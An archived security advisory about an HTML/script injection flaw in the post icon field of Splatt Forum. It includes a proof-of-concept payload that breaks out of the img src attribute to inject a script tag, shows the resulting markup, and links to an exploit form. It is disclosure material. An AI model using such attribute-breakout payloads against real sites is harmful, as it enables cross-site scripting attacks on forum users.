Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: bt638.txt

Splatt Forum html injection code in post icon







Any user can inject html code when create a new post.

The bug are in the post icon:

<img src="icon.gif" etc.>

If you create a personalized form with this code:

icon.gif"><script>alert('bug');<script><any

tag="

the final code of the post icon is:

<img

src="icon.gif"><script>alert('bug');<script><any

tag="" etc.>



The exploit form is here:

http://members.fortunecity.it/lethalman2002/bugs/splatt.html



by Lethal Lab (Lethalman)


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH